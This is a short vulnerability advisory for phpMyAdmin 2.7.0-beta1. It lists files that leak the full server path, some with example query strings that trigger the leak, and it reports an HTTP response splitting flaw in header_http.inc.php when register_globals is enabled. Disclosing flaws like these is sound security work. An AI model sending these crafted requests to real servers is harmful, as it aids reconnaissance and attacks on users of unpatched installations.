phpMyAdmin is "a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields".
Multiple security vulnerabilities have been found in phpMyAdmin, these range from full path disclosure to allowing attackers to preform HTTP response splitting.
Vulnerable Systems:
* phpMyAdmin version 2.7.0-beta1
Full Path Disclosures in the following files:
libraries/string.lib.php
libraries/storage_engines.lib.php
libraries/sqlparser.lib.php
libraries/sql_query_form.lib.php
libraries/select_theme.lib.php
libraries/select_lang.lib.php
libraries/relation_cleanup.lib.php
libraries/left_header.inc.php
libraries/import.lib.php
libraries/header_meta_style.inc.php
libraries/grab_globals.lib.php
libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo)
libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo)
libraries/display_import.lib.php
libraries/display_export.lib.php
libraries/display_create_table.lib.php
libraries/display_create_database.lib.php
libraries/db_table_exists.lib.php
libraries/database_interface.lib.php
libraries/common.lib.php
libraries/check_user_privileges.lib.php
libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true)
libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE)
libraries/import/sql.php
libraries/fpdf/ufpdf.php
libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true)
HTTP Response Splitting in libraries/header_http.inc.php:
The script doesn't check for direct access. If register_globals is on, it is possible for a remote attacker to cause HTTP response splitting.
Impact:
A remote attacker could exploit this to learn installation paths on server. The HTTP Response splitting vulnerability can lead to user compromise amongst other things.
